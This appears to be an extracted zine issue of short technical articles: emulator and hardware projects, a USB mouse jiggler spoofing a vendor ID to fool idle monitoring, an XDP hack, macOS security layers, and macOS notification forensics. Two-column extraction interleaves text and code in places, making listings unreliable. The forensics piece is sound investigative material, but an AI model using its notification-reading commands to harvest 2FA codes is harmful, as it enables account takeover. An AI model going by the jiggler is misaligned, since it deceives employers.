complex chip with two 16 bit counters, interrupt triggering, As with many great things, the journey has been the real
a shift register, two 8 bit I/O ports and some control lines. reward! I really love playing around with my emulator and
All run at clock cycle speed. I still add new things. But all hours implementing opcodes
It took me two years to implement enough of the 6522. I needed to and chips were almost meditative and relaxing. The reward
add clock cycle handling for the 6502 as well. With it in place, I for translating old specifications to code that works have
could start the system and see that it executed the real ROM been enormous! And most importantly, no-one has been
code. After boot, I could see the boot text character codes in the able to stress me, control the process or comment on the
screen RAM, a first sign of life! I screamed with joy, so loudly implementation. With that, the slow development has been
that my wife thought I was having a heart attack! a great joy!

To get some visual output, the least documented part of the Lots of respect to The Defence Force for reverse engineering and
Oric must be implemented, the ULA: a gate array that documenting the Oric as well as creating great demos and games!

Anders Piniesjö
GitHub: https://github.com/pugo/Pugo-Oric
SAA-TIP 0.0.7 Me: https://www.pugo.org/ 13
Hardware Making a simple Macintosh LC PDS card

In 1990, Apple released the Macintosh LC, which was To handle read cycles, we respond with the existing
powered by the Motorola MC68020 processor. Its LED state whenever our card is selected, /AS
only expansion card slot was the Processor Direct and /DS are asserted, and RW is high.
Slot (PDS), a 96-pin Eurocard connector that
provided direct access to most of the CPU's signals. PDS_SELECT = A31 & !A24 & AS;
[D0..2] = [LED1..3];
This slot survived all the way to the mid '90s when [D0..2].oe = PDS_SELECT & DS & RW;
the Mac had moved to PowerPC. On newer
machines, it was no longer directly connected to the Write cycles are slightly more complex but still
CPU but instead an ASIC emulated 68030 bus cycles straightforward. We latch the new state of the LEDs
for backward compatibility. Many popular machines from the data bus on the rising clock edge at the
including the Color Classic and LC 475 have a PDS. end of S3, assuming our card is selected. On all
other rising clock edges, we just latch the existing
Let's make a simple PDS card that enables a Mac state, resulting in no change to the LEDs.
program to control a few LEDs. First, we need to
understand 68020 and 68030 read and write cycles. LED_WRITING = PDS_SELECT & DS & !RW;
[LED1..3].d = ([D0..2] & LED_WRITING) #
([LED1..3] & !LED_WRITING);
[LED1..3].ar = 'h'0; [LED1..3].sp = 'h'0;

In both cases, we need to immediately acknowledge


the request on the /DSACK pins. This tells the CPU
we've handled the read or write, avoids any wait
states, and also informs it of the data width we're
returning, which is 32 bits for simplicity.

[DSACK0..1] = PDS_SELECT;

However, the /DSACK pins must be left floating


except when our card is addressed. We also need to
drive them high afterward, or else resistors will pull
The R/W line determines if a cycle is a read or write. them up too slowly and possibly interfere with the
During a read cycle, the CPU writes the address to next bus cycle. This is handled with a register that
A31-0. The address and data strobes are asserted delays the PDS selected signal.
during S1, and assuming there are no wait states,
the CPU will latch the incoming data from our card AS_DELAY.d = PDS_SELECT;
on the rising clock edge at the end of S4. AS_DELAY.ar = 'b'0; AS_DELAY.sp = 'b'0;
DSACK_OE = (PDS_SELECT) # (AS_DELAY & !AS);
Write cycles are similar, but the CPU supplies the [DSACK0..1].oe = DSACK_OE;
data. It asserts the data strobe during S3, signaling
that the data is ready on the bus. After the PDS card is wired up using the pinout listed
above, the LEDs can be controlled in C:

static volatile uint32_t *PDSBase(void) {


return (volatile uint32_t *)
(LMGetMMU32Bit() ? 0xE0000000UL :
0x00E00000UL);
}
static void SetLEDOn(int led, bool on) {
if (on)
*PDSBase() |= (1UL << led);
else
*PDSBase() &= ~(1UL << led);
}

This design won't work on the original Mac LC in 24-


All of these signals are available on the PDS bit addressing mode; it lacks an MMU that would
connector. In order to react quickly enough to meet remap PDS reads and writes to the equivalent 32-bit
these tight timing requirements, a programmable address. This is possible to fix by looking at extra
logic device is an ideal solution. We're going to use signals when determining if the card is selected, but
an ATF22V10C CMOS PLD programmed with CUPL. may require removing an LED to make room for
more logic and is left as an exercise for the reader.
The card is selected when A31 is high, A24 is low,
and /AS is asserted. Requiring A24 to be low ensures
we ignore special CPU space cycles.

PIN 1 = CLOCK; PIN 2 = A31; PIN 3 = A24;


PIN [14..16] = ![LED1..3]; PIN 4 = RW;
PIN [17..19] = [D0..2]; PIN 5 = !AS;
PIN [20..21] = ![DSACK0..1]; PIN 6 = !DS;
PIN 22 = DSACK_OE; PIN 23 = AS_DELAY;

Doug Brown
Blog: https://www.downtowndougbrown.com/
14 X/Twitter: @dt_db SAA-TIP 0.0.7
Remote work automation using an old AVR programmer Hardware

Bathroom break extension tool Basic mouse firmware


made from an AVR programmer Mouses are common PC equipment. It would be tiresome
for manufacturers to implement or even for users to install
Steve, as a middle-aged electronics enthusiast, has a few an OS driver each time for a new device. That's why
unused AVR programmers. He works remotely and would the communication protocol for commonly used types
like to be more efficient. What should he do? Automate, of devices was standardized under the name USB HID
of course. How can he automate? Use a mouse jiggler. (Human Interface Device). It is enough to stick to it and
Fortunately, Steve does not need to invest money in a Steve's jiggler will work out of the box.
professional device for remote working. He pulls out a Each USB device needs to provide to an OS a set of
USBasp from a dusty shelf and starts tinkering. descriptors describing its manufacturer and functional-
He devises a plan: ity. Additionally, for HID devices yet another descriptor
needs to be provided to describe data format to be ex-
1. Get a source code of the Ąrmware from changed. In the case of a mouse, this HID descriptor
https://www.Ąschl.de/usbasp/. contains information how data about button presses and
2. Fix compilation issues if needed. mouse motion will be conveyed to a PC.
3. Remove programming functionality.
4. Implement a valid USB HID interface for a mouse Steve modiĄes usbconfig.h to meet his require-
device. ments. He changes USB_CFG_VENDOR_ID,
5. Implement moving the cursor on the screen after USB_CFG_DEVICE_ID and a few other macros
connecting the device. to fake a mouse of a popular manufacturer. He sets a
device class and subclass to 0 as an interface within a
Step 1 is obvious, but what about others? conĄguration speciĄes its own class information. Then,
he sets an interface class, subclass and protocol to, respec-
An error-free start tively, 0x03 (HID Interface Class), 0x01 (Boot Interface
Subclass) and 0x02 (Mouse Protocol). Is that all?
The source code is over 13 years old! In the meantime,
compilers went a long way in terms of generating quality No, Steve still needs a valid USB HID descriptor for
code and detecting possible issues. What was correct a mouse device. He is too lazy to write his own from
back then, now can be perceived as smelly or even faulty. scratch, so he downloads HID Descriptor Tool from
https://usb.org/ and copies a premade one to main.c
Steve tries to build the downloaded source and gets a as const char usbHidReportDescriptor[], which is
bunch of errors similar to this: used internally by the USB stack as soon as the HID
In file included from usbdrv/usbdrv.c:12: report descriptor length macro is set to a non-zero value.
usbdrv/usbdrv.h:455:6: error: variable The chosen HID descriptor speciĄes a 3-byte report buffer
'usbDescriptorDevice' must be const in order to be used for the sake of data exchange. Steve declares
to be put into read-only section by means of uchar reportBuffer[3] and makes sure the contents
'__attribute__((progmem))' are sent as soon as they can be sent by adding
455 | char usbDescriptorDevice[];
if (usbInterruptIsReady()) {
Trivial, thinks Steve. He precedes char with const. The usbSetInterrupt(reportBuffer,
compilation stage goes smooth, contrary to linking. He sizeof(reportBuffer)); }
sees the following:
in the usbPoll() loop in main.c. USB HID protocol uses
/usr/bin/avr-ld: main.o:(.bss+0x0): multiple an interrupt-in endpoint 1 for communication, so Steve
definition of `ispTransmit'; isp.o:(.bss+0x4): sets USB_CFG_HAVE_INTRIN_ENDPOINT
first defined here to 1. He also sets both
USB_CFG_IMPLEMENT_FN_WRITE
Steve takes a deep breath and traverses isp.c and isp.h.
and USB_CFG_IMPLEMENT_FN_READ
A declaration is not a definition, he sighs, prepends
to 0, and removes redundant usbFunctionRead and
extern before uchar (*ispTransmit)(uchar) in isp.h
usbFunctionWrite function stubs left from the old
and adds a proper deĄnition in isp.c.
implementation.

Eradication
Moving the mouse cursor
What can be easier than removing code? The slightly
Easy-peasy, mumbles Steve, and provides random values
bored man opens Makefile and removes isp.o, clock.o
for the 2nd (relative X coordinate) and 3rd (Y) byte
and tpi.o from built objects. He removes correspond-
of reportBuffer each time before it is sent. Such a
ing .c and .h Ąles as well. He deletes any code refer-
solution does not resemble human interaction. Could
encing them from main.c hard-heartedly. What is left
you do better? If not, take a look at https://github.com
are stubs of usbFunctionSetup, usbFunctionRead and
/szymor/usbasp-jiggler for inspiration.
usbFunctionWrite.

Szymon Morawski
https://szymor.github.io/
CC0 15
History AI Won’t Take Your Job

AI Won’t Take Your Job


By ~ @Totally_Not_A_Haxxer

It's 2024, and we’ve hit quite the wall with technology—or should I say, war (lol).
The wall in question? Jobs. Yeah, everyone’s freaking out about how AI is
supposedly coming for all the real hackers' and developers' gigs. But hey, instead
of jumping on the clickbait train with every video, maybe it's time to look at things
from a more positive angle.

If we sit and ask ourselves the question - “will AI take our job” and think it through
logically, while also analyzing our current implementation of AI, will you go
through the ringer because of AI, or, is it since an individual might not just have a
good enough skill set?

Many jobs that people worry about being taken, especially intricate ones such as
reverse engineering and binary exploit development, will likely not be replaced
due to how much it requires to train a model to do such tasks. This often involves
a lot of money and resources. However, you may find jobs where simple tasks
are being given to AI, such as minor development tasks rather than full-fledged
entire code completion. That being said, while AI is taking some jobs, saying that
we will be out of jobs or AI is going to replace us is entirely wrong.

A company I worked at as a ghostwriter for some time replaced my job with GPT.
I have been writing articles for a few months, but they wanted to meet impossible
mass production quantities for cheap, so they moved to using GPT and Jasper to
generate articles. But, after that, I did not stop and I kept going forward and found
ways to tune my work, and make it more unique. By then, I figured out that the
reason jobs are taken from people is split up into multiple reasons, but the
primary one is a list of needs, such as the following: mass production, funding,
production time, and fast ideas.

Ever since I dedicated some time researching the capabilities of AI, and
understanding what it is, also viewing people’s perspectives, especially in other
fields such as art, I realized that you will only have your job taken if you are easy
to replace, predictable, fixed in style, and just doing a task. After all, there is a
reason why some artists are losing to AI when others are still racking stacks of
cash off their art. Not only is it unique, but it's unique because it uses elements
that AI cannot achieve, such as true randomness (true randomness is
unpredictable because it comes from natural, uncontrollable processes, unlike
AI's algorithms). I truly feel that one can survive the wave of AI if one has not only
a versatile skillset, but understands how to get a job without just relying on a
resume, and one who also understands how to adapt to modern-day changes.
Adaption and collaboration are how you survive and soar into the skies.

Instagram: https://www.instagram.com/totally_not_a_haxxer Totally_Not_A_Haxxer


Blog: https://www.medium.com/@Totally_Not_A_Haxxer
16 GitHub: https://www.github.com/TotallyNotAHaxxer CC BY 4.0
Art diary of Ninja Jo (I) Art

Ninja Jo Cara: https://cara.app/ninjajoart


YouTube: https://www.youtube.com/c/ninjajo_art
SAA-TIP 0.0.7 Instagram: https://www.instagram.com/ninjajo_art/ 17
Art Art diary of Ninja Jo (II)

Cara: https://cara.app/ninjajoart Ninja Jo


YouTube: https://www.youtube.com/c/ninjajo_art
18 Instagram: https://www.instagram.com/ninjajo_art/ SAA-TIP 0.0.7
Networks Misusing XDP to make a KV Store

Misusing XDP to /* xdpkv . c */


# include < linux / bpf .h >
make a KV Store # include < bpf_helpers .h >
# include < bpf_endian .h >
XDP is a feature of the Linux kernel that allows you to # include < linux / ip .h >
use eBPF to process packets in the kernel, bypassing the # include < linux / tcp .h >
network stack. We can use to it to implement a terrible # include < linux / if_ether .h >
Key-Value store that can be queried over the network by /* After the includes , we need to */
seeing if it drops a TCP connection. By sending a guess, struct { /* first setup a eBPF map */
the eBPF code can check if its greater than the real value __uint ( type , BPF_MAP_TYPE_HASH ) ;
and drop the connection if that is the case. This lets us __type ( key , __u32 ) ;
perform a binary search to discover the value! __type ( value , __u32 ) ;
__uint ( max_entries , 1024) ;
# Usage for Ubuntu 24.04 } data_map SEC ( " . maps " ) ;
# S = Server , C = Client /* that we control with data we get */
S $ apt install clang libbpf - dev socat struct cmd { /* from this struct */
S $ clang - O3 -g -c - target bpf \ __u32 magic ; __u32 cmd ; /* inside */
-I / usr / include / x86_64 - linux - gnu / \ __u32 key ; __u32 value ; /* the */
-I / usr / include / bpf / \ }; /* packets that pass a check , */
-o xdpkv . o xdpkv . c /* but first skip over the headers */
S $ sudo ip link set lo \ SEC ( " xdpkv " )
xdpgeneric obj xdpkv . o sec xdpkv int xdpkv_entry ( struct xdp_md * ctx ) {
S $ socat tcp - l :1234 , fork exec : cat void * dend =
C $ python3 client . py ( void *) ( long ) ctx - > data_end ;
S $ sudo ip link set lo xdpgeneric off void * data = ( void *) ( long ) ctx - > data ;
data += sizeof ( struct ethhdr ) ;
# client . py
data += sizeof ( struct iphdr ) ;
import socket , struct , time , math
struct tcphdr * tcp = data ;
class Client : # Ask the server and try
if ( data + sizeof (* tcp ) > dend )
def __init__ (s , pair ) : s . _pair = pair
goto out ;
def cmd (s , cmd , k , v =0 , to =0.2) :
data += tcp - > doff * 4;
# to make a connection , if we get a
struct cmd * c = data ;
try : # timeout , our packet maybe got
if ( data + sizeof (* c ) > dend )
so = socket . socket ( # dropped along
goto out ; /* and look for a magic */
socket . AF_INET , socket . SOCK_STREAM
if ( bpf_htonl (c - > magic ) != 0 x1337 )
) # the way but we ’ ll be optimistic
goto out ; /* and if we find it , */
so . settimeout ( to ) # that our packet
__u32 key = bpf_htonl (c - > key ) ;
so . connect ( s . _pair ) # has made its
__u32 value = bpf_htonl (c - > value ) ;
so . sendall ( struct . pack ( # way on a
__u32 * r = bpf_map_lookup_elem (
’ > LLLL ’ , 0 x1337 , cmd , k , v ) # long
& data_map , & key ) ; /* we can then */
) # journey so we can return true
switch ( bpf_htonl (c - > cmd ) ) {
so . recv (1) # unless we really have
case 0: /* EXISTS */
so . close () # waited far too long
if ( r != NULL )
return True # and except its fate .
return XDP_DROP ;
except TimeoutError : return False
break ;
def get (s , key ) : # But now we can try
case 1: /* QUERY */
if not ( res := not s . cmd (0 , key ) ) :
if ( r == NULL || value > * r )
return res # doing a binary search
return XDP_DROP ;
bot , top = 0 , 0 xff_ff_ff_ff
break ;
while bot != top : # to find out what
case 2: /* SET */
m = math . ceil (( bot + top ) / 2)
bpf_map_update_elem (
if s . cmd (1 , key , m ) : bot = m
& data_map , & key , & value , BPF_ANY ) ;
else : top = m - 1
break ;
return bot # we are looking for .
case 3: /* UNSET */
# So what can we do now ? maybe we can
bpf_map_delete_elem (
c = Client (( ’ localhost ’ , 1234) ) # conn
& data_map , & key ) ;
c . cmd (2 , 1337 , 0 x41_42_43_44 ) # or set
} /* interact and take action . */
print ( hex ( c . get (1337) ) ) # or get
out : return XDP_PASS ;
c . cmd (3 , 1337) # or maybe even unset
}
print ( not c . cmd (0 , 1337) ) # or exist ?

bah
https://b.horn.uk/
20 https://github.com/bahorn/ CC0
Art diary of Ninja Jo (III) Art

Ninja Jo Cara: https://cara.app/ninjajoart


YouTube: https://www.youtube.com/c/ninjajo_art
SAA-TIP 0.0.7 Instagram: https://www.instagram.com/ninjajo_art/ 21
OS Internals Lord of the Apples: One Page To Rule Them All

Lord of the Apples: One Page To Rule Them All


This short article explores the layered security mechanisms in macOS that protect users from malware.

Introduction
Before malicious software can run on macOS, it must overcome multiple layers of security mechanisms that Apple has designed to
protect users. From the moment a file is downloaded to the point of its execution, macOS implements a series of thorough checks that
rigorously block threats. Even when the malware successfully runs, it is additionally isolated with sandboxing mechanisms.

Apple macOS Security Layers


Onions have layers, ogres have layers, and Apple's security also has layers.

1. Quarantine and Gatekeeper - Prevents automatic execution of files, notifying users before they open the file.
When a file is downloaded from the internet, macOS applies a quarantine flag. It indicates that the file originated from an
untrusted source. Technically, this flag is a file extended attribute of com.apple.quarantine (we can check it using ls -l@ or
xattr -l). Files without it bypass all further security mechanisms related to Gatekeeper.

2. Gatekeeper and Notarization - Ensures the application meets the Apple Security policy and it is free from malware.
The Gatekeeper verifies the file to ensure it meets Apple's security requirements. This verification is done using the ticket that
Apple attaches to the application during notarization. All applications must first be uploaded to Apple and notarized.

3. Gatekeeper and XProtect - Blocks malicious files by checking for valid signatures and known threats.
However, it is still possible for the user to agree to run a file that has not been notarized in the window displayed by
Gatekeeper. In this case, XProtect (a built-in malware scanner) verifies whether the file is a virus based on its signatures. If the
signature is known as a virus, the execution is blocked.

4. Code Signing and AMFI (Apple Mobile File Integrity) - Prevents execution of unsigned or tampered applications.
All applications must be code-signed to run by a Developer using its Developer Certificate or by being signed directly by Apple
or ad hoc. Code signing confirms the integrity and authenticity of applications by verifying their digital signatures, ensuring
that they have not been tampered with. During runtime, AMFI is the component that enforces the validity of these signatures.

5. Sandboxing and TCC - Prevents untrusted applications from accessing critical system resources and sensitive data.
TCC manages access to user data (through user consent), while the Sandbox controls app behavior (via system-imposed
restrictions). Both isolate applications, restricting their access to system resources (such as camera or microphone) and
manage permissions for access to sensitive data. So even when the malware successfully bypasses all the layers before now,
its damage is mitigated thanks to this protection because it cannot access all files and use all hardware resources.

6. System Integrity Protection (SIP) - Prevents unauthorized modification of system files, even by the root user.
Even if malware exploits a zero-day vulnerability to gain root access, macOS has System Integrity Protection (SIP), which
restricts root-level modifications to system files and processes. SIP ensures that critical system components are protected
from even privileged users. You will not damage your Mac when SIP is on even from root (at least you shouldn't :D).

References
1. https://github.com/Karmaz95/Snake_Apple
2. https://support.apple.com/en-gb/guide/security/welcome/web
3. https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution
4. https://developer.apple.com/documentation/security/code-signing-services
5. https://developer.apple.com/documentation/security/app-sandbox

GitHub: https://github.com/karmaz95 Karol Mazurek


X/Twitter: https://x.com/karmaz95
22 Blog: https://medium.com/@karol-mazurek CC BY 4.0
Cozy magic shop Art
Igor "grigoreen" Grinku
https://x.com/Grigoreen
SAA-ALL 0.0.7 https://www.artstation.com/grigoreen 23
Art Fatbeard Ramen House
Instagram: @that.pixel.artistt Fatbeard
X/Twitter: @Fatbeard991
24 DeviantArt: https://www.deviantart.com/fatbeard91 SAA-ALL 0.0.7
Linktree: https://linktr.ee/that.pixel.artistt
macOS Notifications Forensics OS Internals

macOS Notifications Forensics sqlite> select * from record order by


delivered_date desc limit 1;
952|74|?u??‫ם‬N"????$?!|bplist00?
Notifications are small little pop-up windows that show
up on the top right of the screen, which show us various *TstylTintlSappTuuidTdateTsrceSreqTorig
information. For example, here is one from Music _com.apple.MusicO?u??‫ם‬N"????$?!#A?B?q??O?}
showing the next played song. ?j?Kз3d)i??g?$!%&'()TattaTdestTsmacTsubtTu
sdaTcateTtitlTiden??!"#TreloRidSfamSutiSpa
tO?O")#jB*??yu5XM?Wartwork|||746970368.887
245|1|1|
We find that there is a big chunk of data which appears
to be encoded. It starts with the word “bplist”, which
indicates that this is a "binary property list" data.
Property lists on macOS can contain arbitrary data,
they’re used to store various configurations. They’re
The messages of these notifications can contain valuable typically used in XML or binary form (but JSON format is
information for an attacker (for example 2FA code from also supported). Luckily plutil can convert the binary
a message) or in a forensics investigation. Let's explore format for us. Below is a one liner that will read the last
where they are stored and how can we read them. record from the database and decode the data column
which stores the actual information about the message.
In macOS Sonoma, these messages are stored inside the
file user@mac ~ % DA=`getconf DARWIN_USER_DIR`;
$DARWIN_USER_DIR/com.apple.notificatio sqlite3
ncenter/db2/db. DARWIN_USER_DIR is a $DA/com.apple.notificationcenter/db2/db
special directory outside of the traditional HOME folder, "select hex(data) from record order by
where data can be stored by the applications. We can get delivered_date desc limit 1;" | xxd -r -p
- | plutil -p -
the location of it by issuing the command getconf {
DARWIN_USER_DIR. This directory typically looks like "app" => "com.apple.Music"
/var/folders/8s/nsmp_98934g5ljv0_njcrm "date" => 746970368.8872451
4m0000gn/0/ and it’s derived from the user's UUID. (...)
}
As of macOS Sequoia this database was moved under
]
~/Library/Group "cate" => "plpl_category"
Containers/group.com.apple.usernoted/d "dest" => 15
b2/db where it’s protected by macOS's privacy "iden" => "com.apple.Music.player"
protection, TCC (Transparency, Consent and Control), "smac" => 0
thus further privileges (e.g.: Full Disk Access) are "subt" => "Yann Tiersen — Le Fabuleux
destin d'Amélie Poulain (Bande originale
required to access the database.
du film)"
"titl" => "Comptine d'un autre été: la
The database is in standard sqlite format, let's connect démarche"
to it and examine its tables. "usda" => {length = 604, bytes =
0x62706c69 73743030 d4010203 04050607 ...
user@mac ~ % DA=`getconf DARWIN_USER_DIR`; 00000000 000001c6 }
sqlite3 (...)
$DA/com.apple.notificationcenter/db2/db }
... Finally, we see some readable output. But this query only
sqlite> .tables shows us the first entry of the data. Let's write a short
app dbinfo displayed requests shell script which iterates through all entries and displays
categories delivered record snoozed
them in JSON format. This is shown below.
The app table will contain a list of apps, and requests,
delivered, displayed, snoozed information about the #!/bin/bash
messages status. dbinfo is just a metadata about the
database, like version, etc... The most interesting table is DB_PATH="$1"
the record one as it will contain the actual messages
SQL_QUERY="SELECT hex(data) FROM record;"
shown. Let's select the last entry added.
sqlite3 "$DB_PATH" "$SQL_QUERY" | while
read -r HEXDATA; do
echo "$HEXDATA" | xxd -r -p - | plutil
-p -
done

Csaba Fitzl
Blog: https://theevilbit.github.io/
SAA-NA-TIP 0.0.7 X/Twitter: @theevilbit 25
REVERSE ENGINEERING CONFERENCE
ORLANDO, FL
2025.02.28 - 2025.03.01
TICKETS AVAILABLE NOW

https://re-verse.io

Become an
exploit-dev Learn:
---------------------
➔ Reverse Engineering
➔ Memory Corruption
without leaving ➔ Shellcoding
➔ Stack Canaries
➔ DEP + ROP
➔ ASLR + Leaks
➔ Heap + Use-After-Free
your ➔ Race Conditions
-------------------------
browser

.--
.-- .-
.- .-.
.-. --.
--. .-
.- --
-- .. ...
... .-.-.-
.-.-.- .-.
.-. .. -- ..---
..--- .-.-.-
.-.-.- ...
... -.--
-.-- ...
... -- .. --
-- ...
...

https://wargames.ret2.systems
Make Your Own Linux with Buildroot and QEMU Operating Systems

Make Your Own write our default configuration into the working .con-
fig file (this is what is used when building a particular
Linux with image), we type:
Buildroot and make q e m u x 8 6 6 4 d e f c o n f i g

QEMU This is the end of the configuration if you are inter-


ested in the default, minimalist image. It’s enough to
start with, but if you want to extend the image with
We will build a working Linux image of a test system additional tools, such as text editors or network com-
and fire it up in the emulator. Thanks to QEMU, we mands, you can do so with ’✩ make menuconfig’.
don’t need external hardware, SD cards or other equip- We have the configuration, now all we need to do is
ment. All you need is a laptop with Linux and an inter- build the system using the command:
net connection.
make ❂ j ✩ ( nproc )
Buildroot is a flexible and powerful open-source tool
for developing Linux-based operating systems, especially This is an improvement on calling plain ’make’. It will
for embedded devices. It is designed to simplify and cause the build process to be fired on all available CPU
speed up the process of building a system. cores. This will make the whole thing go faster. And
QEMU is an open-source software that performs hard- the build process will not be quick... You can definitely
ware virtualization. Together with KVM, it can pro- take a coffee break or walk a dog. Relevant XKCD:
vide quick and performant simulation environment. It’s https://xkcd.com/303/
widely used for tasks such as running and testing differ- After a long while, the build process will finish and
ent operating systems, especially embedded targets. the following log will appear:
By building a system from source, we have more flexi-
bility than when downloading ready-made packages, and >>> E x e c u t i n g post ❂image s c r i p t
by using automation scripts, we can reduce the repeti- board /qemu/ post ❂image . sh
tive and tedious tasks involved in building our custom This means all target files generated successfully. Now
Linux distro. it’s time to verify that the files generated by Buildroot
Buildroot has a collaborative community and one of will work. Normally, we would need hardware on which
the best technical docs I’ve seen in industry. Unfortu- to load our kernel image and rootfs. Fortunately, thanks
nately, it is still not very well indexed by both Google to QEMU, we can do this quickly and painlessly.
and AI assistants. Make sure to check out the project The resulting files can be found here:
homepage where it’s all at: https://buildroot.org/
Now - Let’s get started! l s output / images /
We download the project code from source. Build- bzImage r o o t f s . e x t 2 s t a r t ❂qemu . sh
root is an open-source tool, we can grab it straight from
Where bzImage is the compressed kernel image and
github:
rootfs.ext2 is rootfs image (a place where all needed files
git clone \ and libraries are).
https :// g i t . b u i l d r o o t . org / b u i l d r o o t How to test and launch our new system?
cd b u i l d r o o t / Buildroot has thought of us and has immediately pre-
g i t c h e c k o u t ❂b my root o r i g i n / 2 0 2 4 . 0 2 . x pared a script that will automatically give the appropri-
ate arguments to the QEMU command and fire up our
The above command downloads the latest master with Linux. Type:
all the history and then creates our private branch based
on the latest LTS - Long Term Support. This is the . / s t a r t ❂qemu . sh
safest solution, as LTS branches are usually very well After a while, we should see the first logs from the
tested and deliberately released for wide use. system start and after a few seconds, we will see the
We have the code, now we can get ready to build. We login prompt (login: root, no password):
will be building the image for QEMU so that, thanks to
the power of emulation, we can immediately check that Welcome t o B u i l d r o o t
our image works. b u i l d r o o t login :
Let’s mount up and set up the configuration. We have full access to our own freshly built Linux!
Fortunately, there are already plenty of default con- Note that the system is very limited and small, with
figurations provided by the project. We can see them only basic functions. You can use the ’✩ cd /’ command
via the command: to go to the root directory and list its contents. The
make l i s t ❂ d e f c o n f i g s system is small but functional.
Once you get the hang of the basics, you can start
We are interested in QEMU configuration for x86 64 adding new packages, modifying the kernel configura-
architecture but feel free to choose any other for QEMU, tion and change the bootloader as you wish (and your
the remaining steps in this tutorial will be the same. To platform permits). Happy hacking!

Karol Przybylski
https://linuxdev.pl/
SAA-ALL 0.0.7 27
Programming Analyzing and Improving Performance Issues with Go applications

Analyzing and Improving Performance The next tip is to carefully decide between the builder
Issues with Go Applications / buffer structures, depending on the API you require.
I generally recommend using strings.Builder, its
The goal of every software developer should be to faster than bytes.Buffer
design and implement a fun-to-use product and slow
software is never fun-to-use. On the contrary, making BenchmarkBuffer-4 0.0000603 ns/op
your own software faster is always a joy - so let me BenchmarkString-4 0.0000466 ns/op
tell you about some things I found fun and practical BenchmarkBufferLarge-4 0.004109 ns/op
when reworking Go applications around performance BenchmarkStringLarge-4 0.003431 ns/op
improvements. If these options are too slow for you, con-
Let’s start off with some tales of mine and why you sider buffering in your own []byte and
should even read this: I wrote an article about a leet- use *(*string)(unsafe.Pointer(&buf)) or
code solution and how I made it significantly faster1 . unsafe.String(unsafe.SliceData(buf), len(buf)),
I created a programming language and made it 8 this reuses the memory already stored at []byte.
times faster afterwards2 . I wrote a paper about the The latter option can half the time spent in string
garbage collection implementations of programming concatenation - however, both approaches use the
languages with a friend and Go was featured in it3 . unsafe package which makes no guarantees for
Furthermore, I implemented a just-in-time compiler portability and compatibility 6 .
and made a Go runtime for a programming language,
making it 14 times faster4 . I also am currently work- BenchmarkArray-4 0.0000222 ns/op
ing on a JSON parser for Go that’s already beating BenchmarkArrayLarge-4 0.002167 ns/op
the encoding/json package 5 . If you consider a function to be hot, e.g. it being
called often and in loops, you should switch from a
Analyzing Applications generic function to a specific function - if applicable.

To find areas for improvement, we can use the pack- func generic[T any](data any) (T, bool) {
age Go provides for this exact purpose. This isn’t the v, ok := data.(T);
place to discuss specifics, but I recommend tinkering if !ok { var e T; return e, false }
with the package. return v, ok
}
package main;import p"runtime/pprof" func specific(data any) (bool, bool) {
func main() { switch data.(type) {
f, _ := os.Create("cpu.pprof") case bool:
p.StartCPUProfile(f) return true, true
defer p.StopCPUProfile() default:
// logic here return false, false
} }
}
Another way for conducting an analysis is to use
The results are very situation dependent and require
hyperfine for comparing the performance of two bi-
lots of benchmarking.
naries.
BenchmarkGeneric-4 0.0003623 ns/op
BenchmarkSpecific-4 0.0003494 ns/op
Performance Tips for Go
To minimize the usage of expensive syscalls and
Let’s look at some specific Go tips and tricks for low batch input/output actions, the bufio package should
hanging, fast universal changes one can make to get always be used for files and other file-like structures.
better performance out of your existing code. The The final tip is to use (*bytes.Reader).ReadByte in-
first specific tip is to start preallocating slices and stead of (*bytes.Reader).ReadRune.
maps with values determined with benchmarks:
BenchmarkReadByte-4 0.0004150 ns/op
// don't BenchmarkReadRune-4 0.0008462 ns/op
a := []byte{}
Tu sum up: always benchmark all changes and note
m := map[string]int{}
their improvements. If you make a lot of long liv-
// do
ing copies, as is often the case with interpreters and
a := make([]byte, 0, 16)
parsers, either use an arena or pointers - copying
m := make(map[string]int, 16)
can be expensive if there are a lot of those. Always
1 https://xnacly.me/posts/2023/leetcode-optimization/
search for fast paths, the goal is to always do less,
2 https://xnacly.me/posts/2023/language-performance/
3 https://xnacly.me/papers/modern_algorithms_for_gc.pdf
look for early returns, such as edge cases for zero
4 https://xnacly.me/papers/tree-walk-vs-go-jit.pdf values and such.
5 https://github.com/xNaCly/libjson 6 https://pkg.go.dev/unsafe

xnacly
Blog: https://xnacly.me
28 Github: https://github.com/xnacly SAA-TIP 0.0.7
King Skull Art

parigraf/pix
Instagram : @parigrafpix
SAA-TIP 0.0.7 Artstation : https://www.artstation.com/parigraf 29
Programming Base64 Unused Bits Steganography

Base64 encoding is well known and used everywhere. There are, however, some less-known quirks related to it,
which are known only to... well, everyone who ever implemented Base64 encoding or decoding manually,
especially if it was tested on a large diverse test set.
Regardless, not everyone has done that, so let's share this one specific trick with everyone else :)
The trick is rather simple, but we do have to start with how Base64 actually works – and this is explained best
with a diagram (TL;DW Base64 basically maps every 3 raw bytes of input to 4 alphabet characters of output):

bit bit
7 byte 0 0 byte 1 byte 2

6-bit unsigned 6-bit unsigned 6-bit unsigned 6-bit unsigned


integer (number) integer (number) integer (number) integer (number)
063 063 063 063

Code Table Alphabet)


0 A 8 I 16 Q 24 Y 32 g 40 o 48 w 56 4
1 B 9 J 17 R 25 Z 33 h 41 p 49 x 57 5
2 C 10 K 18 S 26 a 34 i 42 q 50 y 58 6
3 D 11 L 19 T 27 b 35 j 43 r 51 z 59 7
